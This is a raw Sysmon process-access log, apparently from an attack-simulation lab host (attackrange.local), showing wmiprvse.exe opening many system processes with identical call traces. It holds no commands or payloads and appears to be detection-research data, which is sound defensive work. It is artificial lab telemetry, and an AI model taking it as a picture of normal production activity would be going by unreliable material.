16:01:39.206{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-2C00-00000000A301}2896C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000029143Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:01:39.206{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000029142Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:01:39.206{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-2900-00000000A301}2792C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000029141Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:01:39.206{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-2800-00000000A301}2544C:\Windows\System32\spoolsv.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000029140Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:01:39.206{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4990-6008-2600-00000000A301}3044C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000029139Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:01:39.206{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-498C-6008-2400-00000000A301}2932C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000029138Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:01:39.206{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-498C-6008-2300-00000000A301}2924C:\Users\Public\splunkd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000029137Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:01:39.206{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4988-6008-2000-00000000A301}2388C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000029136Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:01:39.206{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1700-00000000A301}1656C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000029135Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:01:39.206{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1600-00000000A301}1536C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000029134Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:01:39.206{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1500-00000000A301}1492C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000029133Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:01:39.206{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1400-00000000A301}1280C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000029132Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:01:39.206{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1300-00000000A301}1264C:\Windows\system32\dwm.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000029131Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:01:39.206{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1200-00000000A301}1176C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000029130Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:01:39.206{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1100-00000000A301}1152C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000029129Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:01:39.206{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1000-00000000A301}1160C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000029128Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:01:39.206{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-0F00-00000000A301}1112C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000029127Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:01:39.206{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-0E00-00000000A301}1080C:\Windows\system32\LogonUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000029126Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:01:39.206{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-0D00-00000000A301}996C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000029125Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:01:39.206{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4986-6008-0C00-00000000A301}608C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000029124Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 